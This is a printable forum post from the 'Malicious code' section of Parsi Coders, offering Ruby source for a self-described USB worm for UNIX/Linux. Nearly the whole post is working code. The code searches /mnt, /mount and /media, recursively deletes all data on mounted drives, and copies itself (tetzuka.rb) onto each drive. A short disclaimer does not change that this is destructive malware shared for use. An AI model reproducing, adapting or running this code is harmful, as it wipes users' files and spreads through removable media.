Parsi Coders
(USB-Worm for UNIX/LINUX) - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+---- انجمن: Malicious code (http://parsicoders.com/forumdisplay.php?fid=62)
+---- موضوع: (USB-Worm for UNIX/LINUX) (/showthread.php?tid=1224)

(USB-Worm for UNIX/LINUX) - Amin_Mansouri - 11-09-2011

Description: This is a Virus (or Worm), that spreads by copying itself to all connected (flash)drives. It does this by checking the directories /mnt, /mount and /media (especially Ubuntu based systems) and copying itself to the directories stored in there. These are normally the ones, where the external drives are connected to. If there is nothing in those directories it will copy there anyway, if there is some data in the directories (normally, when a (flash)drive is connected) it will recursively delete ALL data.
WARNING: This virus has only been tested under special and limited conditions. Do not execute it on a working machine or a machine, that does not belong to you. You are responsible for all actions you take, the author nor the hoster of the site is responsible.

کد:
#!/usr/bin/env ruby
require 'fileutils'
$mount_dirs = Array.new
$mount_dirs = [ "/mnt", "/mount", "/media" ]
for $mount_dir in $mount_dirs do
    if File.directory?($mount_dir) then
        if File.writable?($mount_dir) then
            Dir.open($mount_dir).each do |$dir|
                next if $dir == "." || $dir == ".."
                $dir2 = $mount_dir + "/" + $dir
                    if File.directory?($dir2) then
                        if File.writable?($dir2) then
                            Dir.open($dir2).each do |$file|
                                next if $file == "." || $file == ".."
                                $file2 = $dir2 + "/" + $file
                                    if File.directory?($file2) then
                                        FileUtils.remove_dir($file2, true)
                                    end
                                    if File.file?($file2) then
                                        File.delete($file2)
                                    end
                            end
                        end
                    end
            end
        end
    end
end
for $mount_dir in $mount_dirs do
    if File.directory?($mount_dir) then
        if File.writable?($mount_dir) then
            Dir.open($mount_dir).each do |$dir|
                next if $dir == "." || $dir == ".."
                $dir2 = $mount_dir + "/" + $dir
                $virus = File.open("tetzuka.rb", "r")
                $virus2 = File.open("#{$dir2}/tetzuka.rb", "w")
                $blksize = $virus.stat.blksize
                while ($line = $virus.read($blksize))
                    $virus2.write($line)
                end
            end
        end
    end
end